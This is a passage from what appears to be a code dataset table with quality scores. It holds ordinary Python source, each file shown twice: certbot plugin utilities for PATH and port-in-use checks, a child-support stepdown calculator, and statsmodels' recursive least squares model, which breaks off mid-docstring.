code stringlengths 2k 1.04M | repo_path stringlengths 5 517 | parsed_code stringlengths 0 1.04M | quality_prob float64 0.02 0.95 | learning_prob float64 0.02 0.93 |
|---|---|---|---|---|
import logging
import os
import socket
import zope.component
from certbot import interfaces
from certbot import util
try:
import psutil
USE_PSUTIL = True
except ImportError:
USE_PSUTIL = False
logger = logging.getLogger(__name__)
RENEWER_EXTRA_MSG = (
" For automated renewal, you may want to use a script that stops"
" and starts your webserver. You can find an example at"
" https://certbot.eff.org/docs/using.html#renewal ."
" Alternatively you can use the webroot plugin to renew without"
" needing to stop and start your webserver.")
def path_surgery(restart_cmd):
"""Attempt to perform PATH surgery to find restart_cmd
Mitigates https://github.com/certbot/certbot/issues/1833
:param str restart_cmd: the command that is being searched for in the PATH
:returns: True if the operation succeeded, False otherwise
"""
dirs = ("/usr/sbin", "/usr/local/bin", "/usr/local/sbin")
path = os.environ["PATH"]
added = []
for d in dirs:
if d not in path:
path += os.pathsep + d
added.append(d)
if any(added):
logger.debug("Can't find %s, attempting PATH mitigation by adding %s",
restart_cmd, os.pathsep.join(added))
os.environ["PATH"] = path
if util.exe_exists(restart_cmd):
return True
else:
expanded = " expanded" if any(added) else ""
logger.warning("Failed to find %s in%s PATH: %s", restart_cmd,
expanded, path)
return False
def already_listening(port, renewer=False):
"""Check if a process is already listening on the port.
If so, also tell the user via a display notification.
.. warning::
On some operating systems, this function can only usefully be
run as root.
:param int port: The TCP port in question.
:returns: True or False.
"""
if USE_PSUTIL:
return already_listening_psutil(port, renewer=renewer)
else:
logger.debug("Psutil not found, using simple socket check.")
return already_listening_socket(port, renewer=renewer)
def already_listening_socket(port, renewer=False):
"""Simple socket based check to find out if port is already in use
:param int port: The TCP port in question.
:returns: True or False
"""
try:
testsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
try:
testsocket.bind(("", port))
except socket.error:
display = zope.component.getUtility(interfaces.IDisplay)
extra = ""
if renewer:
extra = RENEWER_EXTRA_MSG
display.notification(
"Port {0} is already in use by another process. This will "
"prevent us from binding to that port. Please stop the "
"process that is populating the port in question and try "
"again. {1}".format(port, extra), height=13)
return True
finally:
testsocket.close()
except socket.error:
pass
return False
def already_listening_psutil(port, renewer=False):
"""Psutil variant of the open port check
:param int port: The TCP port in question.
:returns: True or False.
"""
try:
net_connections = psutil.net_connections()
except psutil.AccessDenied as error:
logger.info("Access denied when trying to list network "
"connections: %s. Are you root?", error)
# this function is just a pre-check that often causes false
# positives and problems in testing (c.f. #680 on Mac, #255
# generally); we will fail later in bind() anyway
return False
listeners = [conn.pid for conn in net_connections
if conn.status == 'LISTEN' and
conn.type == socket.SOCK_STREAM and
conn.laddr[1] == port]
try:
if listeners and listeners[0] is not None:
# conn.pid may be None if the current process doesn't have
# permission to identify the listening process! Additionally,
# listeners may have more than one element if separate
# sockets have bound the same port on separate interfaces.
# We currently only have UI to notify the user about one
# of them at a time.
pid = listeners[0]
name = psutil.Process(pid).name()
display = zope.component.getUtility(interfaces.IDisplay)
extra = ""
if renewer:
extra = RENEWER_EXTRA_MSG
display.notification(
"The program {0} (process ID {1}) is already listening "
"on TCP port {2}. This will prevent us from binding to "
"that port. Please stop the {0} program temporarily "
"and then try again.{3}".format(name, pid, port, extra),
height=13)
return True
except (psutil.NoSuchProcess, psutil.AccessDenied):
# Perhaps the result of a race where the process could have
# exited or relinquished the port (NoSuchProcess), or the result
# of an OS policy where we're not allowed to look up the process
# name (AccessDenied).
pass
return False | certbot/plugins/util.py | import logging
import os
import socket
import zope.component
from certbot import interfaces
from certbot import util
try:
import psutil
USE_PSUTIL = True
except ImportError:
USE_PSUTIL = False
logger = logging.getLogger(__name__)
RENEWER_EXTRA_MSG = (
" For automated renewal, you may want to use a script that stops"
" and starts your webserver. You can find an example at"
" https://certbot.eff.org/docs/using.html#renewal ."
" Alternatively you can use the webroot plugin to renew without"
" needing to stop and start your webserver.")
def path_surgery(restart_cmd):
"""Attempt to perform PATH surgery to find restart_cmd
Mitigates https://github.com/certbot/certbot/issues/1833
:param str restart_cmd: the command that is being searched for in the PATH
:returns: True if the operation succeeded, False otherwise
"""
dirs = ("/usr/sbin", "/usr/local/bin", "/usr/local/sbin")
path = os.environ["PATH"]
added = []
for d in dirs:
if d not in path:
path += os.pathsep + d
added.append(d)
if any(added):
logger.debug("Can't find %s, attempting PATH mitigation by adding %s",
restart_cmd, os.pathsep.join(added))
os.environ["PATH"] = path
if util.exe_exists(restart_cmd):
return True
else:
expanded = " expanded" if any(added) else ""
logger.warning("Failed to find %s in%s PATH: %s", restart_cmd,
expanded, path)
return False
def already_listening(port, renewer=False):
"""Check if a process is already listening on the port.
If so, also tell the user via a display notification.
.. warning::
On some operating systems, this function can only usefully be
run as root.
:param int port: The TCP port in question.
:returns: True or False.
"""
if USE_PSUTIL:
return already_listening_psutil(port, renewer=renewer)
else:
logger.debug("Psutil not found, using simple socket check.")
return already_listening_socket(port, renewer=renewer)
def already_listening_socket(port, renewer=False):
"""Simple socket based check to find out if port is already in use
:param int port: The TCP port in question.
:returns: True or False
"""
try:
testsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
try:
testsocket.bind(("", port))
except socket.error:
display = zope.component.getUtility(interfaces.IDisplay)
extra = ""
if renewer:
extra = RENEWER_EXTRA_MSG
display.notification(
"Port {0} is already in use by another process. This will "
"prevent us from binding to that port. Please stop the "
"process that is populating the port in question and try "
"again. {1}".format(port, extra), height=13)
return True
finally:
testsocket.close()
except socket.error:
pass
return False
def already_listening_psutil(port, renewer=False):
"""Psutil variant of the open port check
:param int port: The TCP port in question.
:returns: True or False.
"""
try:
net_connections = psutil.net_connections()
except psutil.AccessDenied as error:
logger.info("Access denied when trying to list network "
"connections: %s. Are you root?", error)
# this function is just a pre-check that often causes false
# positives and problems in testing (c.f. #680 on Mac, #255
# generally); we will fail later in bind() anyway
return False
listeners = [conn.pid for conn in net_connections
if conn.status == 'LISTEN' and
conn.type == socket.SOCK_STREAM and
conn.laddr[1] == port]
try:
if listeners and listeners[0] is not None:
# conn.pid may be None if the current process doesn't have
# permission to identify the listening process! Additionally,
# listeners may have more than one element if separate
# sockets have bound the same port on separate interfaces.
# We currently only have UI to notify the user about one
# of them at a time.
pid = listeners[0]
name = psutil.Process(pid).name()
display = zope.component.getUtility(interfaces.IDisplay)
extra = ""
if renewer:
extra = RENEWER_EXTRA_MSG
display.notification(
"The program {0} (process ID {1}) is already listening "
"on TCP port {2}. This will prevent us from binding to "
"that port. Please stop the {0} program temporarily "
"and then try again.{3}".format(name, pid, port, extra),
height=13)
return True
except (psutil.NoSuchProcess, psutil.AccessDenied):
# Perhaps the result of a race where the process could have
# exited or relinquished the port (NoSuchProcess), or the result
# of an OS policy where we're not allowed to look up the process
# name (AccessDenied).
pass
return False | 0.480722 | 0.146087 |
from datetime import datetime
from dateutil.relativedelta import relativedelta
from decimal import Decimal
STEPDOWN_MONTH = 6 # Assume children graduate high shcool in June
STEPDOWN_DAY = 30 # Last day before child support reduces is last day of month
def stepdown(children: list, initial_payment_amount: Decimal, num_children_not_before_court: int = 0) -> list:
"""
Create a list of stepdown dates from a list of children.
Each child in the children list must contain the following keys:
* name (str) - The child's name
* dob (datetime) - The child's date of birth
The child can have other keys and they'll be returned to the caller.
Each step-down date in the returned list will be a dict with these keys:
* child (dict) - The dict provided by the caller re this this child
* last_payment_date (datetime) - The date after which child support steps down
Args:
children (list): List of child dicts
initial_payment_amount (Decimal): Amount of initial payment
num_children_not_before_court (int): Number of children obligor is legally obligated
to support who are not involved in this case.
Returns:
(list): List of dicts, one for each step down date. Values will be sorted
by the stepdown_date attribute (ascending).
Raises:
ValueError: If a child is not properly constructed, i.e. missing
a required key or having the wrong datatype as the value.
Example:
children = [
{'name': "Tom", 'dob': datetime(2015, 1, 29)},
{'name': "Cindy", 'dob': datetime(2017, 5, 29)},
{'name': "Ava", 'dob': datetime(2005, 9, 4)}
]
print(stepdown(children, Decimal(1000)))
"""
stepdown_dates = []
initial_child_count = len(children)
sorted_children = sorted(children, key=lambda k: k['dob'])
while sorted_children:
child = sorted_children.pop(0)
__verify_child(child)
turns_18 = child['dob'] + relativedelta(years=+18)
if turns_18.month <= 6:
stepdown_year = turns_18.year
else:
stepdown_year = turns_18.year + 1
stepdown_date = datetime(stepdown_year, STEPDOWN_MONTH, STEPDOWN_DAY)
stepdown_dates.append({
'child': child,
'last_payment_date': stepdown_date,
'payment_amount': __stepdown_amount(initial_payment_amount, initial_child_count, len(sorted_children), num_children_not_before_court)
})
return sorted(stepdown_dates, key=lambda k: k['last_payment_date'])
__REQUIRED_KEYS = [('name', str), ('dob', datetime)]
def __verify_child(child: dict) -> bool:
for key_name, data_type in __REQUIRED_KEYS:
if key_name not in child:
raise(ValueError(f"Invalid child. Missing key {key_name}"))
if not isinstance(child[key_name], data_type):
raise(ValueError(f"Invalid child. Value for '{key_name}'' must be {str(data_type)}"))
return True
__CHILD_SUPPORT_FACTORS = [
[.2000, .2500, .3000, .3500, .4000, .4000, .4000],
[.1750, .2250, .2738, .3220, .3733, .3771, .3800],
[.1600, .2063, .2520, .3033, .3543, .3600, .3644],
[.1475, .1900, .2400, .2900, .3400, .3467, .3520],
[.1360, .1833, .2314, .2800, .3289, .3360, .3418],
[.1333, .1786, .2250, .2722, .3200, .3273, .3333],
[.1314, .1750, .2200, .2660, .3127, .3200, .3262],
[.1300, .1722, .2160, .2609, .3067, .3138, .3200]
]
def __stepdown_amount(initial_payment_amount: Decimal, initial_child_count: int, remaining_child_count: int, num_children_not_before_court: int) -> Decimal:
if num_children_not_before_court > len(__CHILD_SUPPORT_FACTORS):
row = len(__CHILD_SUPPORT_FACTORS) - 1
else:
row = num_children_not_before_court
factors = __CHILD_SUPPORT_FACTORS[row]
if remaining_child_count > len(factors):
new_factor = factors[-1]
else:
new_factor = factors[remaining_child_count]
if initial_child_count > len(factors):
initial_factor = factors[-1]
else:
initial_factor = factors[initial_child_count-1]
net_resources = initial_payment_amount / Decimal(initial_factor)
new_amount = Decimal(net_resources * Decimal(new_factor))
return round(new_amount, 2)
"""
Example usage.
"""
def main():
children = [
{'name': "Tom", 'dob': datetime(2015, 1, 29)},
{'name': "Cindy", 'dob': datetime(2017, 5, 29)},
{'name': "Ava", 'dob': datetime(2005, 9, 4)}
]
print(stepdown(children, Decimal(1000)))
if __name__ == '__main__':
main() | csutils/stepdown.py | from datetime import datetime
from dateutil.relativedelta import relativedelta
from decimal import Decimal
STEPDOWN_MONTH = 6 # Assume children graduate high shcool in June
STEPDOWN_DAY = 30 # Last day before child support reduces is last day of month
def stepdown(children: list, initial_payment_amount: Decimal, num_children_not_before_court: int = 0) -> list:
"""
Create a list of stepdown dates from a list of children.
Each child in the children list must contain the following keys:
* name (str) - The child's name
* dob (datetime) - The child's date of birth
The child can have other keys and they'll be returned to the caller.
Each step-down date in the returned list will be a dict with these keys:
* child (dict) - The dict provided by the caller re this this child
* last_payment_date (datetime) - The date after which child support steps down
Args:
children (list): List of child dicts
initial_payment_amount (Decimal): Amount of initial payment
num_children_not_before_court (int): Number of children obligor is legally obligated
to support who are not involved in this case.
Returns:
(list): List of dicts, one for each step down date. Values will be sorted
by the stepdown_date attribute (ascending).
Raises:
ValueError: If a child is not properly constructed, i.e. missing
a required key or having the wrong datatype as the value.
Example:
children = [
{'name': "Tom", 'dob': datetime(2015, 1, 29)},
{'name': "Cindy", 'dob': datetime(2017, 5, 29)},
{'name': "Ava", 'dob': datetime(2005, 9, 4)}
]
print(stepdown(children, Decimal(1000)))
"""
stepdown_dates = []
initial_child_count = len(children)
sorted_children = sorted(children, key=lambda k: k['dob'])
while sorted_children:
child = sorted_children.pop(0)
__verify_child(child)
turns_18 = child['dob'] + relativedelta(years=+18)
if turns_18.month <= 6:
stepdown_year = turns_18.year
else:
stepdown_year = turns_18.year + 1
stepdown_date = datetime(stepdown_year, STEPDOWN_MONTH, STEPDOWN_DAY)
stepdown_dates.append({
'child': child,
'last_payment_date': stepdown_date,
'payment_amount': __stepdown_amount(initial_payment_amount, initial_child_count, len(sorted_children), num_children_not_before_court)
})
return sorted(stepdown_dates, key=lambda k: k['last_payment_date'])
__REQUIRED_KEYS = [('name', str), ('dob', datetime)]
def __verify_child(child: dict) -> bool:
for key_name, data_type in __REQUIRED_KEYS:
if key_name not in child:
raise(ValueError(f"Invalid child. Missing key {key_name}"))
if not isinstance(child[key_name], data_type):
raise(ValueError(f"Invalid child. Value for '{key_name}'' must be {str(data_type)}"))
return True
__CHILD_SUPPORT_FACTORS = [
[.2000, .2500, .3000, .3500, .4000, .4000, .4000],
[.1750, .2250, .2738, .3220, .3733, .3771, .3800],
[.1600, .2063, .2520, .3033, .3543, .3600, .3644],
[.1475, .1900, .2400, .2900, .3400, .3467, .3520],
[.1360, .1833, .2314, .2800, .3289, .3360, .3418],
[.1333, .1786, .2250, .2722, .3200, .3273, .3333],
[.1314, .1750, .2200, .2660, .3127, .3200, .3262],
[.1300, .1722, .2160, .2609, .3067, .3138, .3200]
]
def __stepdown_amount(initial_payment_amount: Decimal, initial_child_count: int, remaining_child_count: int, num_children_not_before_court: int) -> Decimal:
if num_children_not_before_court > len(__CHILD_SUPPORT_FACTORS):
row = len(__CHILD_SUPPORT_FACTORS) - 1
else:
row = num_children_not_before_court
factors = __CHILD_SUPPORT_FACTORS[row]
if remaining_child_count > len(factors):
new_factor = factors[-1]
else:
new_factor = factors[remaining_child_count]
if initial_child_count > len(factors):
initial_factor = factors[-1]
else:
initial_factor = factors[initial_child_count-1]
net_resources = initial_payment_amount / Decimal(initial_factor)
new_amount = Decimal(net_resources * Decimal(new_factor))
return round(new_amount, 2)
"""
Example usage.
"""
def main():
children = [
{'name': "Tom", 'dob': datetime(2015, 1, 29)},
{'name': "Cindy", 'dob': datetime(2017, 5, 29)},
{'name': "Ava", 'dob': datetime(2005, 9, 4)}
]
print(stepdown(children, Decimal(1000)))
if __name__ == '__main__':
main() | 0.810929 | 0.396243 |
from __future__ import division, absolute_import, print_function
try: unicode
except NameError: unicode = str
from warnings import warn
from statsmodels.compat.collections import OrderedDict
import numpy as np
import pandas as pd
from statsmodels.regression.linear_model import OLS
from statsmodels.tools.data import _is_using_pandas
from statsmodels.tsa.statespace.mlemodel import (
MLEModel, MLEResults, MLEResultsWrapper, PredictionResults,
PredictionResultsWrapper)
from statsmodels.tools.tools import Bunch
from statsmodels.tools.decorators import cache_readonly, resettable_cache
import statsmodels.base.wrapper as wrap
# Columns are alpha = 0.1, 0.05, 0.025, 0.01, 0.005
_cusum_squares_scalars = np.array([
[1.0729830, 1.2238734, 1.3581015, 1.5174271, 1.6276236],
[-0.6698868, -0.6700069, -0.6701218, -0.6702672, -0.6703724],
[-0.5816458, -0.7351697, -0.8858694, -1.0847745, -1.2365861]
])
class RecursiveLS(MLEModel):
r"""
Recursive least squares
Parameters
----------
endog : array_like
The observed time-series process :math:`y`
exog : array_like
Array of exogenous regressors, shaped nobs x k.
constraints : array-like, str, or tuple
- array : An r x k array where r is the number of restrictions to
test and k is the number of regressors. It is assumed that the
linear combination is equal to zero.
- str : The full hypotheses to test can be given as a string.
See the examples.
- tuple : A tuple of arrays in the form (R, q), ``q`` can be
either a scalar or a length p row vector.
Notes
-----
Recursive least squares (RLS) corresponds to expanding window ordinary
least squares (OLS).
This model applies the Kalman filter to compute recursive estimates of the
coefficients and recursive residuals.
References
----------
.. [*] <NAME>, and <NAME>. 2012.
Time Series Analysis by State Space Methods: Second Edition.
Oxford University Press.
"""
def __init__(self, endog, exog, constraints=None, **kwargs):
# Standardize data
if not _is_using_pandas(endog, None):
endog = np.asanyarray(endog)
exog_is_using_pandas = _is_using_pandas(exog, None)
if not exog_is_using_pandas:
exog = np.asarray(exog)
# Make sure we have 2-dimensional array
if exog.ndim == 1:
if not exog_is_using_pandas:
exog = exog[:, None]
else:
exog = pd.DataFrame(exog)
self.k_exog = exog.shape[1]
# Handle constraints
self.k_constraints = 0
self._r_matrix = self._q_matrix = None
if constraints is not None:
from patsy import DesignInfo
from statsmodels.base.data import handle_data
data = handle_data(endog, exog, **kwargs)
names = data.param_names
LC = DesignInfo(names).linear_constraint(constraints)
self._r_matrix, self._q_matrix = LC.coefs, LC.constants
self.k_constraints = self._r_matrix.shape[0]
endog = np.c_[endog, np.zeros((len(endog), len(self._r_matrix)))]
endog[:, 1:] = self._q_matrix
# Handle coefficient initialization
kwargs.setdefault('initialization', 'diffuse')
# Initialize the state space representation
super(RecursiveLS, self).__init__(
endog, k_states=self.k_exog, exog=exog, **kwargs)
# Use univariate filtering by default
self.ssm.filter_univariate = True
# Concentrate the scale out of the likelihood function
self.ssm.filter_concentrated = True
# Setup the state space representation
self['design'] = np.zeros((self.k_endog, self.k_states, self.nobs))
self['design', 0] = self.exog[:, :, None].T
if self._r_matrix is not None:
self['design', 1:, :] = self._r_matrix[:, :, None]
self['transition'] = np.eye(self.k_states)
# Notice that the filter output does not depend on the measurement
# variance, so we set it here to 1
self['obs_cov', 0, 0] = 1.
self['transition'] = np.eye(self.k_states)
# Linear constraints are technically imposed by adding "fake" endog
# variables that are used during filtering, but for all model- and
# results-based purposes we want k_endog = 1.
if self._r_matrix is not None:
self.k_endog = 1
@classmethod
def from_formula(cls, formula, data, subset=None, constraints=None):
return super(MLEModel, cls).from_formula(formula, data, subset,
constraints=constraints)
def fit(self):
"""
Fits the model by application of the Kalman filter
Returns
-------
RecursiveLSResults
"""
smoother_results = self.smooth(return_ssm=True)
with self.ssm.fixed_scale(smoother_results.scale):
res = self.smooth()
return res
def filter(self, return_ssm=False, **kwargs):
# Get the state space output
result = super(RecursiveLS, self).filter([], transformed=True,
cov_type='none',
return_ssm=True, **kwargs)
# Wrap in a results object
if not return_ssm:
params = result.filtered_state[:, -1]
cov_kwds = {
'custom_cov_type': 'nonrobust',
'custom_cov_params': result.filtered_state_cov[:, :, -1],
'custom_description': ('Parameters and covariance matrix'
' estimates are RLS estimates'
' conditional on the entire sample.')
}
result = RecursiveLSResultsWrapper(
RecursiveLSResults(self, params, result, cov_type='custom',
cov_kwds=cov_kwds)
)
return result
def smooth(self, return_ssm=False, **kwargs):
# Get the state space output
result = super(RecursiveLS, self).smooth([], transformed=True,
cov_type='none',
return_ssm=True, **kwargs)
# Wrap in a results object
if not return_ssm:
params = result.filtered_state[:, -1]
cov_kwds = {
'custom_cov_type': 'nonrobust',
'custom_cov_params': result.filtered_state_cov[:, :, -1],
'custom_description': ('Parameters and covariance matrix'
' estimates are RLS estimates'
' conditional on the entire sample.')
}
result = RecursiveLSResultsWrapper(
RecursiveLSResults(self, params, result, cov_type='custom',
cov_kwds=cov_kwds)
)
return result
@property
def param_names(self):
return self.exog_names
@property
def start_params(self):
# Only parameter is the measurement disturbance standard deviation
return np.zeros(0)
def update(self, params, **kwargs):
"""
Update the parameters of the model
Updates the representation matrices to fill in the new parameter
values.
Parameters
----------
params : array_like
Array of new parameters.
transformed : boolean, optional
Whether or not `params` is already transformed. If set to False,
`transform_params` is called. Default is True..
Returns
-------
params : array_like
Array of parameters.
"""
pass
class RecursiveLSResults(MLEResults):
"""
Class to hold results from fitting a recursive least squares model.
Parameters
----------
model : RecursiveLS instance
The fitted model instance
Attributes
----------
specification : dictionary
Dictionary including all attributes from the recursive least squares
model instance.
See Also
--------
statsmodels.tsa.statespace.kalman_filter.FilterResults
statsmodels.tsa.statespace.mlemodel.MLEResults
"""
def __init__(self, model, params, filter_results, cov_type='opg',
**kwargs):
super(RecursiveLSResults, self).__init__(
model, params, filter_results, cov_type, **kwargs)
# Since we are overriding params with things that aren't MLE params,
# need to adjust df's
q = max(self.loglikelihood_burn, self.k_diffuse_states)
self.df_model = q - self.model.k_constraints
self.df_resid = self.nobs_effective - self.df_model
# Save _init_kwds
self._init_kwds = self.model._get_init_kwds()
# Save the model specification
self.specification = Bunch(**{
'k_exog': self.model.k_exog,
'k_constraints': self.model.k_constraints})
@property
def recursive_coefficients(self):
"""
Estimates of regression coefficients, recursively estimated
Returns
-------
out: Bunch
Has the following attributes:
- `filtered`: a time series array with the filtered estimate of
the component
- `filtered_cov`: a time series array with the filtered estimate of
the variance/covariance of the component
- `smoothed`: a time series array with the smoothed estimate of
the component
- `smoothed_cov`: a time series array with the smoothed estimate of
the variance/covariance of the component
- `offset`: an integer giving the offset in the state vector where
this component begins
"""
out = None
spec = self.specification
start = offset = 0
end = offset + spec.k_exog
out = Bunch(
filtered=self.filtered_state[start:end],
filtered_cov=self.filtered_state_cov[start:end, start:end],
smoothed=None, smoothed_cov=None,
offset=offset
)
if self.smoothed_state is not None:
out.smoothed = self.smoothed_state[start:end]
if self.smoothed_state_cov is not None:
out.smoothed_cov = (
self.smoothed_state_cov[start:end, start:end])
return out
@cache_readonly
def resid_recursive(self):
r"""
Recursive residuals
Returns
-------
resid_recursive : array_like
An array of length `nobs` holding the recursive
residuals.
Notes
-----
These quantities are defined in, for example, Harvey (1989)
section 5.4. In fact, there he defines the standardized innovations in
equation 5.4.1, but in his version they have non-unit variance, whereas
the standardized forecast errors computed by the Kalman filter here
assume unit variance. To convert to Harvey's definition, we need to
multiply by the standard deviation.
Harvey notes that in smaller samples, "although the second moment
of the :math:`\tilde \sigma_*^{-1} \tilde v_t`'s is unity, the
variance is not necessarily equal to unity as the mean need not be
equal to zero", and he defines an alternative version (which are
not provided here).
"""
return (self.filter_results.standardized_forecasts_error[0] *
self.scale**0.5)
@cache_readonly
def cusum(self):
r"""
Cumulative sum of standardized recursive residuals statistics
Returns
-------
cusum : array_like
An array of length `nobs - k_exog` holding the
CUSUM statistics.
Notes
-----
The CUSUM statistic takes the form:
.. math::
W_t = \frac{1}{\hat \sigma} \sum_{j=k+1}^t w_j
where :math:`w_j` is the recursive residual at time :math:`j` and
:math:`\hat \sigma` is the estimate of the standard deviation
from the full sample.
Excludes the first `k_exog` datapoints.
Due to differences in the way :math:`\hat \sigma` is calculated, the
output of this function differs slightly from the output in the
R package strucchange and the Stata contributed .ado file cusum6. The
calculation in this package is consistent with the description of
Brown et al. (1975)
References
----------
.. [*] <NAME>., <NAME>, and <NAME>. 1975.
"Techniques for Testing the Constancy of
Regression Relationships over Time."
Journal of the Royal Statistical Society.
Series B (Methodological) 37 (2): 149-92.
"""
d = max(self.nobs_diffuse, self.loglikelihood_burn)
return (np.cumsum(self.resid_recursive[d:]) /
np.std(self.resid_recursive[d:], ddof=1))
@cache_readonly
def cusum_squares(self):
r"""
Cumulative sum of squares of standardized recursive residuals
statistics
Returns
-------
cusum_squares : array_like
An array of length `nobs - k_exog` holding the
CUSUM of squares statistics.
Notes
-----
The CUSUM of squares statistic takes the form:
.. math::
s_t = \left ( \sum_{j=k+1}^t w_j^2 \right ) \Bigg /
\left ( \sum_{j=k+1}^T w_j^2 \right )
where :math:`w_j` is the recursive residual at time :math:`j`.
Excludes the first `k_exog` datapoints.
References
----------
.. [*] <NAME>., <NAME>, and <NAME>. 1975.
"Techniques for Testing the Constancy of
Regression Relationships over Time."
Journal of the Royal Statistical Society.
Series B (Methodological) 37 (2): 149-92.
"""
d = max(self.nobs_diffuse, self.loglikelihood_burn)
numer = np.cumsum(self.resid_recursive[d:]**2)
denom = numer[-1]
return numer / denom
@cache_readonly
def llf_recursive_obs(self):
"""
(float) Loglikelihood at observation, computed from recursive residuals
"""
from scipy.stats import norm
return np.log(norm.pdf(self.resid_recursive, loc=0,
scale=self.scale**0.5))
@cache_readonly
def llf_recursive(self):
"""
(float) Loglikelihood defined by recursive residuals, equivalent to OLS
"""
return np.sum(self.llf_recursive_obs)
@cache_readonly
def ssr(self):
d = max(self.nobs_diffuse, self.loglikelihood_burn)
return (self.nobs - d) * self.filter_results.obs_cov[0, 0, 0]
@cache_readonly
def centered_tss(self):
return np.sum((self.filter_results.endog[0] -
np.mean(self.filter_results.endog))**2)
@cache_readonly
def uncentered_tss(self):
return np.sum((self.filter_results.endog[0])**2)
@cache_readonly
def ess(self):
if self.k_constant:
return self.centered_tss - self.ssr
else:
return self.uncentered_tss - self.ssr
@cache_readonly
def rsquared(self):
if self.k_constant:
return 1 - self.ssr / self.centered_tss
else:
return 1 - self.ssr / self.uncentered_tss
@cache_readonly
def mse_model(self):
return self.ess / self.df_model
@cache_readonly
def mse_resid(self):
return self.ssr / self.df_resid
@cache_readonly
def mse_total(self):
if self.k_constant:
return self.centered_tss / (self.df_resid + self.df_model)
else:
return self.uncentered_tss / (self.df_resid + self.df_model)
def get_prediction(self, start=None, end=None, dynamic=False,
index=None, **kwargs):
# Note: need to override this, because we currently don't support
# dynamic prediction or forecasts when there are constraints.
if start is None:
start = self.model._index[0]
# Handle start, end, dynamic
start, end, out_of_sample, prediction_index = (
self.model._get_prediction_index(start, end, index))
# Handle `dynamic`
if isinstance(dynamic, (bytes, unicode)):
dynamic, _, _ = self.model._get_index_loc(dynamic)
if self.model._r_matrix is not None and (out_of_sample or dynamic):
raise NotImplementedError('Cannot yet perform out-of-sample or'
' dynamic prediction in models with'
' constraints.')
# Perform the prediction
# This is a (k_endog x npredictions) array; don't want to squeeze in
# case of npredictions = 1
prediction_results = self.filter_results.predict(
start, end + out_of_sample + 1, dynamic, **kwargs)
# Return a new mlemodel.PredictionResults object
return PredictionResultsWrapper(PredictionResults(
self, prediction_results, row_labels=prediction_index))
get_prediction.__doc__ = MLEResults.get_prediction.__doc__
def plot_recursive_coefficient(self, variables=0, alpha=0.05,
legend_loc='upper left', fig=None,
figsize=None):
r"""
Plot the recursively estimated coefficients on a given variable
Parameters
----------
variables : int or str or iterable of int or string, optional
Integer index or string name of the variable whose coefficient will
be plotted. Can also be an iterable of integers or strings. Default
is the first variable.
alpha : float, optional
The confidence intervals for the coefficient are (1 - alpha) %
legend_loc : string, optional
The location of the legend in the plot. Default is upper left.
fig : Matplotlib Figure instance, optional
If given, subplots are created in this figure instead of in a new
figure. Note that the grid will be created in the provided
figure using `fig.add_subplot()`.
figsize : tuple, optional
If a figure is created, this argument allows specifying a size.
The tuple is (width, height).
Notes
-----
All plots contain (1 - `alpha`) % confidence intervals.
"""
# Get variables
if isinstance(variables, (int, str)):
variables = [variables]
k_variables = len(variables)
# If a string was given for `variable`, try to get it from exog names
exog_names = self.model.exog_names
for i in range(k_variables):
variable = variables[i]
if isinstance(variable, str):
variables[i] = exog_names.index(variable)
# Create the plot
from scipy.stats import norm
from statsmodels.graphics.utils import _import_mpl, create_mpl_fig
plt = _import_mpl()
fig = create_mpl_fig(fig, figsize)
for i in range(k_variables):
variable = variables[i]
ax = fig.add_subplot(k_variables, 1, i + 1)
# Get dates, if applicable
if hasattr(self.data, 'dates') and self.data.dates is not None:
dates = self.data.dates._mpl_repr()
else:
dates = np.arange(self.nobs)
d = max(self.nobs_diffuse, self.loglikelihood_burn)
# Plot the coefficient
coef = self.recursive_coefficients
ax.plot(dates[d:], coef.filtered[variable, d:],
label='Recursive estimates: %s' % exog_names[variable])
# Legend
handles, labels = ax.get_legend_handles_labels()
# Get the critical value for confidence intervals
if alpha is not None:
critical_value = norm.ppf(1 - alpha / 2.)
# Plot confidence intervals
std_errors = np.sqrt(coef.filtered_cov[variable, variable, :])
ci_lower = (
coef.filtered[variable] - critical_value * std_errors)
ci_upper = (
coef.filtered[variable] + critical_value * std_errors)
ci_poly = ax.fill_between(
dates[d:], ci_lower[d:], ci_upper[d:], alpha=0.2
)
ci_label = ('$%.3g \\%%$ confidence interval'
% ((1 - alpha)*100))
# Only add CI to legend for the first plot
if i == 0:
# Proxy artist for fill_between legend entry
# See http://matplotlib.org/1.3.1/users/legend_guide.html
p = plt.Rectangle((0, 0), 1, 1,
fc=ci_poly.get_facecolor()[0])
handles.append(p)
labels.append(ci_label)
ax.legend(handles, labels, loc=legend_loc)
# Remove xticks for all but the last plot
if i < k_variables - 1:
ax.xaxis.set_ticklabels([])
fig.tight_layout()
return fig
def _cusum_significance_bounds(self, alpha, ddof=0, points=None):
"""
Parameters
----------
alpha : float, optional
The significance bound is alpha %.
ddof : int, optional
The number of periods additional to `k_exog` to exclude in
constructing the bounds. Default is zero. This is usually used
only for testing purposes.
points : iterable, optional
The points at which to evaluate the significance bounds. Default is
two points, beginning and end of the sample.
Notes
-----
Comparing against the cusum6 package for Stata, this does not produce
exactly the same confidence bands (which are produced in cusum6 by
lw, uw) because they burn the first k_exog + 1 periods instead of the
first k_exog. If this change is performed
(so that `tmp = (self.nobs - d - 1)**0.5`), then the output here
matches cusum6.
The cusum6 behavior does not seem to be consistent with
Brown et al. (1975); it is likely they did that because they needed
three initial observations to get the initial OLS estimates, whereas
we do not need to do that.
"""
# Get the constant associated with the significance level
if alpha == 0.01:
scalar = 1.143
elif alpha == 0.05:
scalar = 0.948
elif alpha == 0.10:
scalar = 0.950
else:
raise ValueError('Invalid significance level.')
# Get the points for the significance bound lines
d = max(self.nobs_diffuse, self.loglikelihood_burn)
tmp = (self.nobs - d - ddof)**0.5
upper_line = lambda x: scalar * tmp + 2 * scalar * (x - d) / tmp
if points is None:
points = np.array([d, self.nobs])
return -upper_line(points), upper_line(points)
def plot_cusum(self, alpha=0.05, legend_loc='upper left',
fig=None, figsize=None):
r"""
Plot the CUSUM statistic and significance bounds.
Parameters
----------
alpha : float, optional
The plotted significance bounds are alpha %.
legend_loc : string, optional
The location of the legend in the plot. Default is upper left.
fig : Matplotlib Figure instance, optional
If given, subplots are created in this figure instead of in a new
figure. Note that the grid will be created in the provided
figure using `fig.add_subplot()`.
figsize : tuple, optional
If a figure is created, this argument allows specifying a size.
The tuple is (width, height).
Notes
-----
Evidence of parameter instability may be found if the CUSUM statistic
moves out of the significance bounds.
References
----------
.. [*] <NAME>., <NAME>, and <NAME>. 1975.
"Techniques for Testing the Constancy of
Regression Relationships over Time."
